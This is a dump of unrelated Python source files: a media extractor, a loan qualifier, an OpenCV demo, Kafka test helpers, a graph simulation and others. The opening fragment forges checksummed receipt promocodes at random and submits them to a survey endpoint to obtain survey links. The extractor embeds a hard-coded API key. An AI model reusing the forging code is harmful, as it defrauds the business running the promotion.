_logger.debug('Loading "{}"...'.format(_locations_filename))
with open(os.path.join(os.path.dirname(__file__), _locations_filename)) as f:
locations = json.loads(f.read())
else:
_logger.debug('"{}" not found. Most promocodes won\'t be valid.'.format(_locations_filename))
pass
def parse_date(d):
return d.strftime('%Y-%m-%d')
def days_diff(d1):
d1 = datetime.strptime(d1, "%Y-%m-%d")
d2 = datetime.strptime('2014-12-31', "%Y-%m-%d")
return abs((d2 - d1).days)
def days_to_date(d):
return datetime.strptime('2014-12-31', "%Y-%m-%d") + timedelta(days=int(d))
def flip(string):
temp = ''
for x in range(len(string)):
temp = string[x] + temp
return temp
def decimal_to_base28(src):
dictionary = 'ABCDEFGHIJKLMNOPRSTUWXZ45679'
return utils.decimal_to_base(dictionary, src)
def base28_to_decimal(src):
dictionary = 'ABCDEFGHIJKLMNOPRSTUWXZ45679'
return utils.base_to_decimal(dictionary, src)
def right(src, n):
if n <= 0:
return ''
elif n > len(src):
return src
else:
return src[(len(src) - n):len(src)]
def checksum(src):
total = 0
for i in range(len(src)):
total = total + ord(src[i]) * (3 ** (len(src) - i))
result = right('AAA' + decimal_to_base28(total), 3)
return result
def verify_checksum(src):
c_checksum = get_checksum(src)
c_no_checksum = get_code_without_checksum(src)
return c_checksum == c_no_checksum
def insert_at(src, ins, ind):
return src[:ind] + ins + src[ind:]
def get_checksum(src):
return src[11:12] + src[7:8] + src[1:2]
def get_code_without_checksum(src):
return src[:1] + src[2:7] + src[8:11] + src[12:]
def decode_promocode(promocode):
gen = get_code_without_checksum(promocode)
gen2 = str(base28_to_decimal(gen))[1:]
gen3 = flip(gen2)
return {
'pos': gen3[4:6],
'site': gen3[:4],
'date': days_to_date(gen3[6:10]),
'num': gen3[10:]
}
def generate_promocode(pos, site, date, num_trans):
gen = '{:04}{:02}{:04}{:04}'.format(site, pos, days_diff(date), num_trans)
gen2 = flip(gen)
gen3 = '1' + gen2
gen4 = decimal_to_base28(gen3)
gen5 = checksum(gen4)
gen6 = gen4
gen6 = insert_at(gen6, gen5[0], 9)
gen6 = insert_at(gen6, gen5[1], 6)
gen6 = insert_at(gen6, gen5[2], 1)
return gen6
def generate_random_promocode():
if 'locations' in globals():
location = random.choice(locations)
else:
location = random.randint(1, 3240)
data = {
'pos': random.randint(0, 20),
'site': location,
'date': parse_date(datetime.now()),
'num_trans': random.randint(0, 9999)
}
return generate_promocode(data['pos'], data['site'], data['date'], data['num_trans'])
def generate_survey_link(promocode, proxies=None, verify=True):
data = {
'invoice': promocode,
'meta': {}
}
_logger.debug(decode_promocode(promocode))
x = requests.post(check_invoice, json=data, proxies=proxies, verify=verify)
_logger.debug('{}: {}'.format(x.status_code, x.content))
if x.status_code == 200:
y = json.loads(x.content.decode())
return '{url}?lang=it×tamp={timestamp}&mbunq={mbunq}'\
.format(url=y['data']['meta']['url'], timestamp=y['data']['meta']['timestamp'], mbunq=y['data']['data'])
else:
return None
|
py | b40b4c4afded1b6f9541d60b3b2d3fb5fe0c5973 | # coding: utf-8
from __future__ import unicode_literals
import json
import hashlib
import re
from .aws import AWSIE
from .anvato import AnvatoIE
from .common import InfoExtractor
from ..utils import (
smuggle_url,
urlencode_postdata,
xpath_text,
)
class ScrippsNetworksWatchIE(AWSIE):
IE_NAME = 'scrippsnetworks:watch'
_VALID_URL = r'''(?x)
https?://
watch\.
(?P<site>geniuskitchen)\.com/
(?:
player\.[A-Z0-9]+\.html\#|
show/(?:[^/]+/){2}|
player/
)
(?P<id>\d+)
'''
_TESTS = [{
'url': 'http://watch.geniuskitchen.com/player/3787617/Ample-Hills-Ice-Cream-Bike/',
'info_dict': {
'id': '4194875',
'ext': 'mp4',
'title': 'Ample Hills Ice Cream Bike',
'description': 'Courtney Rada churns up a signature GK Now ice cream with The Scoopmaster.',
'uploader': 'ANV',
'upload_date': '20171011',
'timestamp': 1507698000,
},
'params': {
'skip_download': True,
},
'add_ie': [AnvatoIE.ie_key()],
}]
_SNI_TABLE = {
'geniuskitchen': 'genius',
}
_AWS_API_KEY = 'E7wSQmq0qK6xPrF13WmzKiHo4BQ7tip4pQcSXVl1'
_AWS_PROXY_HOST = 'web.api.video.snidigital.com'
_AWS_USER_AGENT = 'aws-sdk-js/2.80.0 callback'
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
site_id, video_id = mobj.group('site', 'id')
aws_identity_id_json = json.dumps({
'IdentityId': '%s:7655847c-0ae7-4d9b-80d6-56c062927eb3' % self._AWS_REGION
}).encode('utf-8')
token = self._download_json(
'https://cognito-identity.%s.amazonaws.com/' % self._AWS_REGION, video_id,
data=aws_identity_id_json,
headers={
'Accept': '*/*',
'Content-Type': 'application/x-amz-json-1.1',
'Referer': url,
'X-Amz-Content-Sha256': hashlib.sha256(aws_identity_id_json).hexdigest(),
'X-Amz-Target': 'AWSCognitoIdentityService.GetOpenIdToken',
'X-Amz-User-Agent': self._AWS_USER_AGENT,
})['Token']
sts = self._download_xml(
'https://sts.amazonaws.com/', video_id, data=urlencode_postdata({
'Action': 'AssumeRoleWithWebIdentity',
'RoleArn': 'arn:aws:iam::710330595350:role/Cognito_WebAPIUnauth_Role',
'RoleSessionName': 'web-identity',
'Version': '2011-06-15',
'WebIdentityToken': token,
}), headers={
'Referer': url,
'X-Amz-User-Agent': self._AWS_USER_AGENT,
'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
})
def get(key):
return xpath_text(
sts, './/{https://sts.amazonaws.com/doc/2011-06-15/}%s' % key,
fatal=True)
mcp_id = self._aws_execute_api({
'uri': '/1/web/brands/%s/episodes/scrid/%s' % (self._SNI_TABLE[site_id], video_id),
'access_key': get('AccessKeyId'),
'secret_key': get('SecretAccessKey'),
'session_token': get('SessionToken'),
}, video_id)['results'][0]['mcpId']
return self.url_result(
smuggle_url(
'anvato:anvato_scripps_app_web_prod_0837996dbe373629133857ae9eb72e740424d80a:%s' % mcp_id,
{'geo_countries': ['US']}),
AnvatoIE.ie_key(), video_id=mcp_id)
class ScrippsNetworksIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?(?P<site>cookingchanneltv|discovery|(?:diy|food)network|hgtv|travelchannel)\.com/videos/[0-9a-z-]+-(?P<id>\d+)'
_TESTS = [{
'url': 'https://www.cookingchanneltv.com/videos/the-best-of-the-best-0260338',
'info_dict': {
'id': '0260338',
'ext': 'mp4',
'title': 'The Best of the Best',
'description': 'Catch a new episode of MasterChef Canada Tuedsay at 9/8c.',
'timestamp': 1475678834,
'upload_date': '20161005',
'uploader': 'SCNI-SCND',
},
'add_ie': ['ThePlatform'],
}, {
'url': 'https://www.diynetwork.com/videos/diy-barnwood-tablet-stand-0265790',
'only_matching': True,
}, {
'url': 'https://www.foodnetwork.com/videos/chocolate-strawberry-cake-roll-7524591',
'only_matching': True,
}, {
'url': 'https://www.hgtv.com/videos/cookie-decorating-101-0301929',
'only_matching': True,
}, {
'url': 'https://www.travelchannel.com/videos/two-climates-one-bag-5302184',
'only_matching': True,
}, {
'url': 'https://www.discovery.com/videos/guardians-of-the-glades-cooking-with-tom-cobb-5578368',
'only_matching': True,
}]
_ACCOUNT_MAP = {
'cookingchanneltv': 2433005105,
'discovery': 2706091867,
'diynetwork': 2433004575,
'foodnetwork': 2433005105,
'hgtv': 2433004575,
'travelchannel': 2433005739,
}
_TP_TEMPL = 'https://link.theplatform.com/s/ip77QC/media/guid/%d/%s?mbr=true'
def _real_extract(self, url):
site, guid = re.match(self._VALID_URL, url).groups()
return self.url_result(smuggle_url(
self._TP_TEMPL % (self._ACCOUNT_MAP[site], guid),
{'force_smil_url': True}), 'ThePlatform', guid)
|
py | b40b4c618652b1d95a5f8ccb16a73c615aa8ed5c | # -*- coding: utf-8 -*-
"""Loan Qualifier Application.
This is a command line application to match applicants with qualifying loans.
Example:
$ python app.py
"""
import sys
from click import confirm
import fire
import questionary
from pathlib import Path
import os.path
from os import path
import csv
from qualifier.utils.fileio import (load_csv, save_csv)
from qualifier.utils.calculators import (
calculate_monthly_debt_ratio,
calculate_loan_to_value_ratio,
)
from qualifier.filters.max_loan_size import filter_max_loan_size
from qualifier.filters.credit_score import filter_credit_score
from qualifier.filters.debt_to_income import filter_debt_to_income
from qualifier.filters.loan_to_value import filter_loan_to_value
def load_bank_data():
"""Ask for the file path to the latest banking data and load the CSV file.
Returns:
The bank data from the data rate sheet CSV file.
"""
csvpath = questionary.text("Enter a file path to a rate-sheet (.csv):").ask()
csvpath = Path(csvpath)
if not csvpath.exists():
sys.exit(f"Oops! Can't find this path: {csvpath}")
return load_csv(csvpath)
def get_applicant_info():
"""Prompt dialog to get the applicant's financial information.
Returns:
Returns the applicant's financial information.
"""
credit_score = questionary.text("What's your credit score?").ask()
debt = questionary.text("What's your current amount of monthly debt?").ask()
income = questionary.text("What's your total monthly income?").ask()
loan_amount = questionary.text("What's your desired loan amount?").ask()
home_value = questionary.text("What's your home value?").ask()
credit_score = int(credit_score)
debt = float(debt)
income = float(income)
loan_amount = float(loan_amount)
home_value = float(home_value)
return credit_score, debt, income, loan_amount, home_value
def find_qualifying_loans(bank_data, credit_score, debt, income, loan, home_value):
"""Determine which loans the user qualifies for.
Loan qualification criteria is based on:
- Credit Score
- Loan Size
- Debt to Income ratio (calculated)
- Loan to Value ratio (calculated)
Args:
bank_data (list): A list of bank data.
credit_score (int): The applicant's current credit score.
debt (float): The applicant's total monthly debt payments.
income (float): The applicant's total monthly income.
loan (float): The total loan amount applied for.
home_value (float): The estimated home value.
Returns:
A list of the banks willing to underwrite the loan.
"""
# Calculate the monthly debt ratio
monthly_debt_ratio = calculate_monthly_debt_ratio(debt, income)
print(f"The monthly debt to income ratio is {monthly_debt_ratio:.02f}")
# Calculate loan to value ratio
loan_to_value_ratio = calculate_loan_to_value_ratio(loan, home_value)
print(f"The loan to value ratio is {loan_to_value_ratio:.02f}.")
# Run qualification filters
bank_data_filtered = filter_max_loan_size(loan, bank_data)
bank_data_filtered = filter_credit_score(credit_score, bank_data_filtered)
bank_data_filtered = filter_debt_to_income(monthly_debt_ratio, bank_data_filtered)
bank_data_filtered = filter_loan_to_value(loan_to_value_ratio, bank_data_filtered)
print(f"Found {len(bank_data_filtered)} qualifying loans")
return bank_data_filtered
def save_qualifying_loans(qualifying_loans):
"""Accepts the list of qualifying loans and asks where to save it.
Args:
qualifying_loans (list of lists): The qualifying bank loans.
"""
# Questionary confirm tool to check if user wants to save list
if questionary.confirm("Would you like to save the list of qualifying loans?").ask():
# If user doesn't have any loans, exit with exit message
if not(len(qualifying_loans) > 0):
sys.exit("You have no loans to save, nice try")
# If user has more than one loan and wants to save list, ask for output file path
output_file_path = questionary.text("Enter the output file path (.csv): ").ask()
# If sure, write list into output file path variable saved above
if questionary.confirm("Are you sure?").ask():
with open(output_file_path, 'w', encoding='UTF8', newline='') as f:
writer = csv.writer(f)
writer.writerows(qualifying_loans)
# Print loans have been saved in specified file path
print(f"The list of qualifying loans has been saved in {output_file_path}")
def run():
"""The main function for running the script."""
# Load the latest Bank data
bank_data = load_bank_data()
# Get the applicant's information
credit_score, debt, income, loan_amount, home_value = get_applicant_info()
# Find qualifying loans
qualifying_loans = find_qualifying_loans(
bank_data, credit_score, debt, income, loan_amount, home_value
)
# Save qualifying loans
save_qualifying_loans(qualifying_loans)
if __name__ == "__main__":
fire.Fire(run)
|
py | b40b4cdb9cff9581dccf3a6e626750d98de0b5e3 |
import numpy as np
import cv2
import os
import sys
path = os.path.abspath(os.path.dirname(sys.argv[0]))
#鼠标事件的回调函数
def on_mouse(event,x,y,flag,param):
global rect
global leftButtonDowm
global leftButtonUp
#鼠标左键按下
if event == cv2.EVENT_LBUTTONDOWN:
rect[0] = x
rect[2] = x
rect[1] = y
rect[3] = y
leftButtonDowm = True
leftButtonUp = False
#移动鼠标事件
if event == cv2.EVENT_MOUSEMOVE:
if leftButtonDowm and not leftButtonUp:
rect[2] = x
rect[3] = y
#鼠标左键松开
if event == cv2.EVENT_LBUTTONUP:
if leftButtonDowm and not leftButtonUp:
x_min = min(rect[0],rect[2])
y_min = min(rect[1],rect[3])
x_max = max(rect[0],rect[2])
y_max = max(rect[1],rect[3])
rect[0] = x_min
rect[1] = y_min
rect[2] = x_max
rect[3] = y_max
leftButtonDowm = False
leftButtonUp = True
img = cv2.imread(path + '/imgs/low_quality1.jpg')
mask = np.zeros(img.shape[:2],np.uint8)
bgdModel = np.zeros((1,65),np.float64) #背景模型
fgdModel = np.zeros((1,65),np.float64) #前景模型
rect = [0,0,0,0] #设定需要分割的图像范围
leftButtonDowm = False #鼠标左键按下
leftButtonUp = True #鼠标左键松开
cv2.namedWindow('img') #指定窗口名来创建窗口
cv2.setMouseCallback('img',on_mouse) #设置鼠标事件回调函数 来获取鼠标输入
cv2.imshow('img',img) #显示图片
while cv2.waitKey(2) == -1:
#左键按下,画矩阵
if leftButtonDowm and not leftButtonUp:
img_copy = img.copy()
cv2.rectangle(img_copy,(rect[0],rect[1]),(rect[2],rect[3]),(0,255,0),2)
cv2.imshow('img',img_copy)
#左键松开,矩形画好
elif not leftButtonDowm and leftButtonUp and rect[2] - rect[0] != 0 and rect[3] - rect[1] != 0:
rect[2] = rect[2]-rect[0]
rect[3] = rect[3]-rect[1]
rect_copy = tuple(rect.copy())
rect = [0,0,0,0]
#物体分割
cv2.grabCut(img,mask,rect_copy,bgdModel,fgdModel,2,cv2.GC_INIT_WITH_RECT)
mask2 = np.where((mask==2)|(mask==0),0,1).astype('uint8')
img_show = img*mask2[:,:,np.newaxis]
#显示图片分割后结果--显示原图
cv2.imshow('grabcut',img_show)
cv2.imshow('img',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
py | b40b4d2aa2a1a0241dc74f0ab50634d4466705d8 | #Django
from django.db import models
#Utilities
from AmbieNet.util.models.ambienet import AmbieNetModel
class Profile(AmbieNetModel):
"""
Profile.
Data from common user of application, (users of social network).
"""
user = models.OneToOneField('users.User', on_delete=models.CASCADE)
picture = models.CharField(max_length=255, blank=True, null=True)
biography = models.TextField(max_length=500, blank=True)
"""User's ubication"""
country = models.TextField(max_length=30)
state = models.TextField(max_length=30)
city = models.TextField(max_length=30)
"""User's ubication exactly"""
latitude = models.FloatField(default=0.0)
longitude = models.FloatField(default=0.0)
reputation = models.FloatField(
default=5.0,
help_text="User's reputation based on the rides taken and offered."
)
|
py | b40b4d39c3bccd3c24cc7a3be39506e9ad4cfed7 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kafkatest import __version__ as __kafkatest_version__
import math
import re
import time
def kafkatest_version():
"""Return string representation of current ducktape version."""
return __kafkatest_version__
def _kafka_jar_versions(proc_string):
"""Use a rough heuristic to find all kafka versions explicitly in the process classpath. We need to handle patterns
like:
- kafka_2.11-1.0.0-SNAPSHOT.jar
- kafka_2.11-0.11.0.0-SNAPSHOT.jar
- kafka-1.0.0/bin/../libs/* (i.e. the JARs are not listed explicitly)
- kafka-0.11.0.0/bin/../libs/* (i.e. the JARs are not listed explicitly)
- kafka-streams-1.0.0-SNAPSHOT.jar
- kafka-streams-0.11.0.0-SNAPSHOT.jar
"""
# Pattern example: kafka_2.11-1.0.0-SNAPSHOT.jar (we have to be careful not to partially match the 4 segment version string)
versions = re.findall("kafka_[0-9]+\.[0-9]+-([0-9]+\.[0-9]+\.[0-9]+)[\.-][a-zA-z]", proc_string)
# Pattern example: kafka_2.11-0.11.0.0-SNAPSHOT.jar
versions.extend(re.findall("kafka_[0-9]+\.[0-9]+-([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)", proc_string))
# Pattern example: kafka-1.0.0/bin/../libs/* (i.e. the JARs are not listed explicitly, we have to be careful not to
# partially match the 4 segment version)
versions.extend(re.findall("kafka-([0-9]+\.[0-9]+\.[0-9]+)/", proc_string))
# Pattern example: kafka-0.11.0.0/bin/../libs/* (i.e. the JARs are not listed explicitly)
versions.extend(re.findall("kafka-([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)", proc_string))
# Pattern example: kafka-streams-1.0.0-SNAPSHOT.jar (we have to be careful not to partially match the 4 segment version string)
versions.extend(re.findall("kafka-[a-z]+-([0-9]+\.[0-9]+\.[0-9]+)[\.-][a-zA-z]", proc_string))
# Pattern example: kafka-streams-0.11.0.0-SNAPSHOT.jar
versions.extend(re.findall("kafka-[a-z]+-([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)", proc_string))
return set(versions)
def is_version(node, version_list, proc_grep_string="kafka", logger=None):
"""Heuristic to check that only the specified version appears in the classpath of the process
A useful tool to aid in checking that service version apis are working correctly.
"""
lines = [l for l in node.account.ssh_capture("ps ax | grep %s | grep -v grep" % proc_grep_string)]
assert len(lines) == 1
psLine = lines[0]
versions = _kafka_jar_versions(psLine)
r = versions == {str(v) for v in version_list}
if not r and logger is not None:
logger.warning("%s: %s version mismatch: expected %s, actual %s, ps line %s" % \
(str(node), proc_grep_string, version_list, versions, psLine))
return r
def is_int(msg):
"""Method used to check whether the given message is an integer
return int or raises an exception if message is not an integer
"""
try:
return int(msg)
except ValueError:
raise Exception("Unexpected message format (expected an integer). Message: %s" % (msg))
def is_int_with_prefix(msg):
"""
Method used check whether the given message is of format 'integer_prefix'.'integer_value'
:param msg: message to validate
:return: msg or raises an exception is a message is of wrong format
"""
try:
parts = msg.split(".")
if len(parts) != 2:
raise Exception("Unexpected message format. Message should be of format: integer "
"prefix dot integer value. Message: %s" % (msg))
int(parts[0])
int(parts[1])
return msg
except ValueError:
raise Exception("Unexpected message format. Message should be of format: integer "
"prefix dot integer value, but one of the two parts (before or after dot) "
"are not integers. Message: %s" % (msg))
def node_is_reachable(src_node, dst_node):
"""
Returns true if a node is unreachable from another node.
:param src_node: The source node to check from reachability from.
:param dst_node: The destination node to check for reachability to.
:return: True only if dst is reachable from src.
"""
return 0 == src_node.account.ssh("nc -w 3 -z %s 22" % dst_node.account.hostname, allow_fail=True)
def annotate_missing_msgs(missing, acked, consumed, msg):
missing_list = list(missing)
msg += "%s acked message did not make it to the Consumer. They are: " %\
len(missing_list)
if len(missing_list) < 20:
msg += str(missing_list) + ". "
else:
msg += ", ".join(str(m) for m in missing_list[:20])
msg += "...plus %s more. Total Acked: %s, Total Consumed: %s. " \
% (len(missing_list) - 20, len(set(acked)), len(set(consumed)))
return msg
def annotate_data_lost(data_lost, msg, number_validated):
print_limit = 10
if len(data_lost) > 0:
msg += "The first %s missing messages were validated to ensure they are in Kafka's data files. " \
"%s were missing. This suggests data loss. Here are some of the messages not found in the data files: %s\n" \
% (number_validated, len(data_lost), str(data_lost[0:print_limit]) if len(data_lost) > print_limit else str(data_lost))
else:
msg += "We validated that the first %s of these missing messages correctly made it into Kafka's data files. " \
"This suggests they were lost on their way to the consumer." % number_validated
return msg
def validate_delivery(acked, consumed, idempotence_enabled=False, check_lost_data=None, may_truncate_acked_records=False):
"""Check that each acked message was consumed."""
success = True
msg = ""
# Correctness of the set difference operation depends on using equivalent
# message_validators in producer and consumer
missing = set(acked) - set(consumed)
# Were all acked messages consumed?
if len(missing) > 0:
msg = annotate_missing_msgs(missing, acked, consumed, msg)
# Did we miss anything due to data loss?
if check_lost_data:
max_truncate_count = 100 if may_truncate_acked_records else 0
max_validate_count = max(1000, max_truncate_count)
to_validate = list(missing)[0:min(len(missing), max_validate_count)]
data_lost = check_lost_data(to_validate)
# With older versions of message format before KIP-101, data loss could occur due to truncation.
# These records won't be in the data logs. Tolerate limited data loss for this case.
if len(missing) < max_truncate_count and len(data_lost) == len(missing):
msg += "The %s missing messages were not present in Kafka's data files. This suggests data loss " \
"due to truncation, which is possible with older message formats and hence are ignored " \
"by this test. The messages lost: %s\n" % (len(data_lost), str(data_lost))
else:
msg = annotate_data_lost(data_lost, msg, len(to_validate))
success = False
else:
success = False
# Are there duplicates?
if len(set(consumed)) != len(consumed):
num_duplicates = abs(len(set(consumed)) - len(consumed))
if idempotence_enabled:
success = False
msg += "Detected %d duplicates even though idempotence was enabled.\n" % num_duplicates
else:
msg += "(There are also %d duplicate messages in the log - but that is an acceptable outcome)\n" % num_duplicates
return success, msg
|
py | b40b4d5af13c3219e82e3c7e07ee632bba4e2fda | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='adafruit-circuitpython-ble-adafruit',
use_scm_version=True,
setup_requires=['setuptools_scm'],
description='Description ',
long_description=long_description,
long_description_content_type='text/x-rst',
# The project's main homepage.
url='https://github.com/adafruit/Adafruit_CircuitPython_BLE_Adafruit',
# Author details
author='Adafruit Industries',
author_email='[email protected]',
install_requires=[
'Adafruit-Blinka',
'adafruit-circuitpython-ble'
],
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Topic :: System :: Hardware',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# What does your project relate to?
keywords='adafruit blinka circuitpython micropython circuitplayground bluefruit CLUE ble',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
# TODO: IF LIBRARY FILES ARE A PACKAGE FOLDER,
# CHANGE `py_modules=['...']` TO `packages=['...']`
py_modules=['adafruit_ble_adafruit'],
)
|
py | b40b4e6c92ba273472a026eb09f0c693722c39dd | #
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from zoo.pipeline.api.onnx.mapper.operator_mapper import OperatorMapper
import zoo.pipeline.api.keras.layers as zlayers
import numpy as np
from zoo.pipeline.api.autograd import Parameter
import bigdl.nn.layer as blayer
class SqueezeMapper(OperatorMapper):
def __init__(self, node, initializer, _all_tensors):
super(SqueezeMapper, self).__init__(node, initializer, _all_tensors)
def _to_tensor(self):
dim = None
if "axes" in self.onnx_attr.keys():
dim = tuple([int(i) for i in self.onnx_attr['axes']])
data = self.model_inputs[0].zvalue
return data.squeeze(dim=dim)
|
py | b40b4e6d85f38337402db997b9d80eea3b061b6d | from datetime import datetime
from logging import getLogger
from typing import Any, List, Tuple
from watchmen_data_kernel.storage import TopicDataService
from watchmen_model.admin import Factor
from watchmen_model.dqc import MonitorRule
from watchmen_utilities import ArrayHelper
from .types import RuleResult
logger = getLogger(__name__)
# noinspection PyUnusedLocal
def factor_common_value_over_coverage(
data_service: TopicDataService, factor: Factor,
data: List[Tuple[Any, int]], rule: MonitorRule,
date_range: Tuple[datetime, datetime],
changed_rows_count_in_range: int, total_rows_count: int
) -> RuleResult:
if changed_rows_count_in_range == 0:
# no changes, success
return RuleResult.SUCCESS
mismatched = ArrayHelper(data) \
.filter(lambda row: row[1] / changed_rows_count_in_range * 100 >= rule.params.aggregation) \
.map(lambda row: row[1]) \
.filter(lambda value: value != 0) \
.some(lambda x: x / changed_rows_count_in_range * 100 > rule.params.coverageRate)
return RuleResult.FAILED if mismatched else RuleResult.SUCCESS
|
py | b40b4ec0a53923a386cf21f4413c52a9d42aab42 | # :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
import mock
from sawmill.logger.traceback import Traceback
def test_extracting_traceback():
'''Test extracting traceback when key set to True.'''
handler = mock.Mock()
logger = Traceback(_handler=handler)
try:
raise ValueError('Forced error')
except Exception:
logger.log(traceback=True)
log = handler.handle.call_args[0][0]
assert isinstance(log['traceback'], basestring)
lines = log['traceback'].splitlines()
assert lines[0] == 'Traceback (most recent call last):'
assert lines[-1] == 'ValueError: Forced error'
def test_custom_traceback():
'''Test setting traceback manually.'''
handler = mock.Mock()
logger = Traceback(_handler=handler)
logger.log(traceback='Some other value')
log = handler.handle.call_args[0][0]
assert log['traceback'] == 'Some other value'
def test_extracting_traceback_outside_exception():
'''Test extracting traceback outside exception.'''
handler = mock.Mock()
logger = Traceback(_handler=handler)
logger.log(traceback=True)
log = handler.handle.call_args[0][0]
assert log['traceback'] == 'None'
|
py | b40b4edc8f227f651d055316f700f8f0f8524b07 | # pylint: disable=unused-argument
import gc
from itertools import product
from functools import reduce
import numpy as np
import pandas as pd
import igraph as ig
from scipy import stats
from sklearn.datasets import make_blobs
from sklearn.externals.joblib import Parallel, delayed
from tqdm import tqdm
from sdnet.utils import euclidean_dist, make_dist_matrix
from sdnet.sda import SDA
import ds
# Data simulation routines ----------------------------------------------------
def simulate_uniform(N, ndim, a=0, b=1, **kwds):
return np.random.uniform(a, b, (N, ndim)), None
def simulate_normal(N, ndim, mean=0, sd=1, **kwds):
return np.random.normal(mean, sd, (N, ndim)), None
def simulate_lognormal(N, ndim, mean=0, sd=1, **kwds):
return np.random.lognormal(mean, sd, (N, ndim)), None
def simulate_normal_clusters(N, ndim, centers=4, center_box=(-8, 8), **kwds):
return make_blobs(N, ndim, centers=centers, center_box=center_box, **kwds)
def simulate_lognormal_clusters(N, ndim, centers=4, center_box=(-4, 4), **kwds):
X, labels = make_blobs(N, ndim, centers=centers, center_box=center_box, **kwds)
return np.exp(X), labels
def simulate_space(kind, N, ndim, centers, **kwds):
kind = kind.lower()
if kind == 'uniform':
return simulate_uniform(N, ndim, **kwds)
if kind == 'normal':
return simulate_normal(N, ndim, **kwds)
if kind == 'lognormal':
return simulate_lognormal(N, ndim, **kwds)
if kind == 'clusters_normal':
return simulate_normal_clusters(N, ndim, centers, **kwds)
if kind == 'clusters_lognormal':
return simulate_lognormal_clusters(N, ndim, centers, **kwds)
raise ValueError(f"incorrect kind of data '{kind}'")
def simulate_degseq(kind, n, k):
kind = kind.lower()
if kind == 'poisson':
degseq = np.random.poisson(k, (n,))
elif kind == 'negbinom':
degseq = np.random.negative_binomial(1, 1 / (1+k), (n,))
elif kind == 'powerlaw':
m = int(k/2)
degseq = np.array(ig.Graph.Barabasi(n, m=m, directed=False).degree())
degseq = degseq + np.random.randint(-m, m, degseq.shape)
degseq[degseq >= n] = n-1
elif kind == 'lognormal':
degseq = np.random.lognormal(np.log(k) - 1/2, 1, (n,)).astype(int)
else:
raise ValueError(f"'{kind}' is not a correct type of degree sequence")
if degseq.sum() % 2 != 0:
return simulate_degseq(kind, n, k)
return degseq
# Simulation runners ----------------------------------------------------------
def run_sda(X, labels, params, rep, simparams, dist=euclidean_dist):
# pylint: disable=too-many-locals
params = product(*[ tuple((k, _) for _ in v) for k, v in params.items() ])
classify_pl = simparams.get('classify_pl', False)
D = make_dist_matrix(X, dist, symmetric=True).astype(np.float32)
records = []
for p in params:
p = dict(p)
sda = SDA.from_dist_matrix(D, **p)
for idx in range(1, rep+1):
A = sda.adjacency_matrix(sparse=True) \
.astype(bool) \
.tolil()
degseq = A.toarray().sum(axis=1).astype(np.uint16)
G = ds.graph_from_sparse(A)
dct = {
'sid': idx,
**p,
'b': sda.b,
'k_avg': degseq.mean(),
'A': A if idx == 1 else None,
'labels': labels.astype(np.int8) if labels is not None else None,
'degseq': degseq,
'deg_skew': stats.skew(degseq),
'deg_kurt': stats.kurtosis(degseq),
'pl_type': ds.estimate_tail_exponent(degseq, n=2, classify=True) \
if classify_pl else None,
'isolates': (degseq == 0).sum(),
'clustering': G.transitivity_undirected(),
'assortativity': G.assortativity_degree(),
'average_path_length': G.average_path_length()
}
dct['degseq'] = degseq_to_text(degseq)
records.append(dct)
df = pd.DataFrame.from_dict(records)
df = df.loc[:, [
'sid', 'k', 'alpha', 'b', 'p_rewire',
'A', 'k_avg', 'clustering', 'assortativity', 'average_path_length',
'isolates', 'labels', 'directed',
'degseq', 'deg_skew', 'deg_kurt', 'pl_type'
]]
return df
def run_sdac(X, labels, params, rep, simparams, dist=euclidean_dist):
# pylint: disable=too-many-locals
params = list(product(*[ tuple((k, _) for _ in v) for k, v in params.items() ]))
conf_model_params = list(product(simparams['degseq_type'], simparams['sort']))
D = make_dist_matrix(X, dist, symmetric=True).astype(np.float32)
records = []
for p in params:
p = dict(p)
sda = SDA.from_dist_matrix(D, **p)
for degseq_type, sort in conf_model_params:
_degseq = simulate_degseq(
kind=degseq_type,
n=sda.N,
k=sda.k
)
sda.set_degseq(_degseq, sort=sort)
for idx in range(1, rep+1):
try:
A = sda.conf_model(simplify=True, sparse=True) \
.astype(bool) \
.tolil()
# pylint: disable=broad-except
except Exception:
continue
degseq = A.toarray().sum(axis=1).astype(np.uint16)
G = ds.graph_from_sparse(A)
dct = {
'sid': idx,
**p,
'b': sda.b,
'k_avg': degseq.mean(),
'degseq_type': degseq_type,
'degseq_sort': sort,
'A': A if idx == 1 else None,
'labels': labels.astype(np.int8) if labels is not None else None,
'degseq': degseq,
'deg_skew': stats.skew(degseq),
'deg_kurt': stats.kurtosis(degseq),
'isolates': (degseq == 0).sum(),
'clustering': G.transitivity_undirected(),
'assortativity': G.assortativity_degree(),
'average_path_length': G.average_path_length()
}
dct['degseq'] = degseq_to_text(degseq)
records.append(dct)
